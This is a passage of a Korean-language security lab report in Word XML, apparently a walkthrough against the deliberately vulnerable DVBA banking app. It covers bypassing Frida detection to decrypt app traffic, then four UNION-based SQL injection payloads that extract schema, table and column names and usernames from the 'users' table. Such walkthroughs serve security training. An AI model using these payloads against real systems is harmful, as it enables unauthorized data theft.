      <w:r w:rsidR="006B7B8F" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>스크립트 실행</w:t>
      </w:r>
      <w:r w:rsidR="00B231E5" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 및 복호화 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F717F6" w:rsidRPr="00C223A0" w:rsidRDefault="006B7B8F" w:rsidP="004C2629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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr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프리다가 실행 </w:t>
      </w:r>
      <w:r w:rsidR="002109F2">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>중에도</w:t>
      </w:r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 정상적으로 앱 실행됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00F717F6" w:rsidRDefault="00F717F6" w:rsidP="00F717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 w:rsidRPr="00FA6AC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6520F69F" wp14:editId="3CA22C0C">
            <wp:extent cx="4680000" cy="514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E5" w:rsidRDefault="00B231E5" w:rsidP="00B231E5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667E98">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>24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프리다를 이용해 프리다 우회 스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7189" w:rsidRDefault="004E7189" w:rsidP="004E7189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FA6AC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="559352B3" wp14:editId="0FD87166">
            <wp:extent cx="1841550" cy="3371850"/>
            <wp:effectExtent l="19050" t="19050" r="2540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14" cy="3393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189" w:rsidRDefault="004E7189" w:rsidP="004E7189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25]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프리다 우회하여 실행한 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36C99" w:rsidRPr="004E7189" w:rsidRDefault="00A36C99" w:rsidP="00B231E5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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E7189" w:rsidRPr="00F51DEB" w:rsidRDefault="00B231E5" w:rsidP="00F51DEB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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_heading=h.23ckvvd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/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프리다를 통해 전송데이터 복호화 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F717F6" w:rsidRPr="00F717F6" w:rsidRDefault="004E7189" w:rsidP="00F717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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CFD56F4" wp14:editId="3DFD8317">
            <wp:extent cx="4680000" cy="778867"/>
            <wp:effectExtent l="0" t="0" r="6350" b="254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99" w:rsidRPr="00A36C99" w:rsidRDefault="00E344BD" w:rsidP="00E344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667E98">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>26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="004E7189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프리다 우회하여 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00163F08" w:rsidRDefault="00EA2F96" w:rsidP="00B231E5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:right="140"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_heading=h.ihv636" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00163F08" w:rsidRPr="00176F06" w:rsidRDefault="006B7B8F" w:rsidP="00163F0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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_heading=h.32hioqz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidR="001672CA" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인젝션</w:t>
      </w:r>
      <w:r w:rsidR="00D61B20" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 데이터베이스정보 추출</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069004F" w:rsidRPr="00C223A0" w:rsidRDefault="008F2475" w:rsidP="008F2475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C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tep1 </w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>스키마이름 추출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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069004F" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="0069004F" w:rsidRPr="00D92DA3" w:rsidRDefault="0069004F" w:rsidP="0069004F">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:spacing w:line="312" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>스키마이름 추출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069004F" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0069004F" w:rsidRDefault="00C56F95" w:rsidP="00CD38E9">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidR="0069004F" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2023-07-11'union select 1,</w:t>
            </w:r>
            <w:r w:rsidR="00A730F5" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">schema_name, 3, 4, 5, 6, 7 from </w:t>
            </w:r>
            <w:r w:rsidR="0069004F" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>information_schema.schemata ;--“</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D94763" w:rsidRDefault="00D94763" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00001828" w:rsidRDefault="00001828" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0"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410210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3558540" cy="167640"/>
                <wp:effectExtent l="0" t="0" r="22860" b="2286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A35A4" id="직사각형 32" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:151.5pt;margin-top:32.3pt;width:280.2pt;height:13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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00001828">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5040000" cy="739423"/>
            <wp:effectExtent l="19050" t="19050" r="8255" b="2286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3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8E9" w:rsidRPr="00CD38E9" w:rsidRDefault="00CD38E9" w:rsidP="00CD38E9">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="76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27] </w:t>
      </w:r>
      <w:r w:rsidR="00D94763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해당 위치에 쿼리문 입력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E593B" w:rsidRDefault="00F717F6" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F5A3F0" wp14:editId="079EF7D9">
            <wp:extent cx="5040000" cy="1347191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75" w:rsidRPr="00D92DA3" w:rsidRDefault="00003B0F" w:rsidP="00D92DA3">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="76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18097E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D94763">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>28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스키마 이름 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94763" w:rsidRPr="00D94763" w:rsidRDefault="00D94763" w:rsidP="00D94763">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00D94763">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">※ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이하 같은 방법으로 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94763" w:rsidRPr="00D94763" w:rsidRDefault="00F717F6" w:rsidP="00D94763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C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="008F2475" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>테이블명 추출</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="7937" w:type="dxa"/>
        <w:tblInd w:w="845" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D92DA3" w:rsidTr="00BF0260">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00D92DA3" w:rsidRPr="00D92DA3" w:rsidRDefault="00D92DA3" w:rsidP="00D92DA3">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:spacing w:line="312" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>테이블명 추출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DA3" w:rsidTr="00BF0260">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D92DA3" w:rsidRPr="00CD38E9" w:rsidRDefault="00D92DA3" w:rsidP="00CD38E9">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>"2023-07-11'union select 1</w:t>
            </w:r>
            <w:r w:rsidR="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">,table_name, 3, 4, 5, 6, 7 from </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>information_schema.tables where table_schema = 'dvba' ;-- “</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000E593B" w:rsidRDefault="00F717F6" w:rsidP="00BF0260">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A2D19DE" wp14:editId="5F46429F">
            <wp:extent cx="5040000" cy="2174654"/>
            <wp:effectExtent l="0" t="0" r="825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97" w:rsidRDefault="002A1397" w:rsidP="00D92DA3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6C1BB5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D94763">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>29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="00003B0F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테이블명 추출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D92DA3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결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2475" w:rsidRDefault="008F2475" w:rsidP="002A1397">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="760"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F717F6" w:rsidRDefault="00F717F6">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F2475" w:rsidRPr="00C223A0" w:rsidRDefault="008F2475" w:rsidP="008F2475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C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step3</w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>유저 테이블의 컬럼명 추출</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="7937" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069004F" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="0069004F" w:rsidRPr="00D92DA3" w:rsidRDefault="0069004F" w:rsidP="00690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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>유저</w:t>
            </w:r>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 테이블의 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>컬럼명</w:t>
            </w:r>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 추출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069004F" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D94763" w:rsidRPr="00D94763" w:rsidRDefault="0069004F" w:rsidP="00D94763">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"2023-07-11'union select 1,column_name, 3, 4, 5, 6,7 from information_schema.columns </w:t>
            </w:r>
            <w:r w:rsidR="00FF1E13" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>where table_name = 'users' ;--"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000E593B" w:rsidRDefault="00F717F6" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD7DAC3" wp14:editId="7FF05F6D">
            <wp:extent cx="5040000" cy="3639468"/>
            <wp:effectExtent l="0" t="0" r="825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75" w:rsidRPr="002A1397" w:rsidRDefault="00A87896" w:rsidP="0069004F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     </w:t>
      </w:r>
      <w:r w:rsidR="002A1397"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667E98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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="002A1397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="002A1397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컬럼명 추출 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F717F6" w:rsidRDefault="00F717F6">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069004F" w:rsidRPr="00C223A0" w:rsidRDefault="008F2475" w:rsidP="008F2475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b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tep4</w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">유저테이블 </w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">에 저장 되어있는 데이터 </w:t>
      </w:r>
      <w:r w:rsidR="00A017DA" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00A017DA" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">개 </w:t>
      </w:r>
      <w:r w:rsidR="00602A7D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>추출</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="7937" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069004F" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="0069004F" w:rsidRPr="00D92DA3" w:rsidRDefault="0069004F" w:rsidP="000E593B">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:spacing w:line="312" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">유저테이블 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidR="000E593B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000E593B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>추출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069004F" w:rsidRPr="00CD38E9" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0069004F" w:rsidRPr="00CD38E9" w:rsidRDefault="00FF1E13" w:rsidP="00CD38E9">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidR="0069004F" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2023-07-11'union select 1,username, 3, 4, 5, 6,7 from dvba.users</w:t>
            </w:r>
            <w:r w:rsidR="00602A7D" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> limit 0,20</w:t>
            </w:r>
            <w:r w:rsidR="0069004F" w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ;--</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000E593B" w:rsidRDefault="00F717F6" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C172B86" wp14:editId="7FED9947">
            <wp:extent cx="5040000" cy="6531163"/>
            <wp:effectExtent l="0" t="0" r="8255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5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97" w:rsidRPr="0069004F" w:rsidRDefault="000E593B" w:rsidP="0069004F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           </w:t>
      </w:r>
      <w:r w:rsidR="002A1397" w:rsidRPr="0069004F"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18097E" w:rsidRPr="0069004F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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
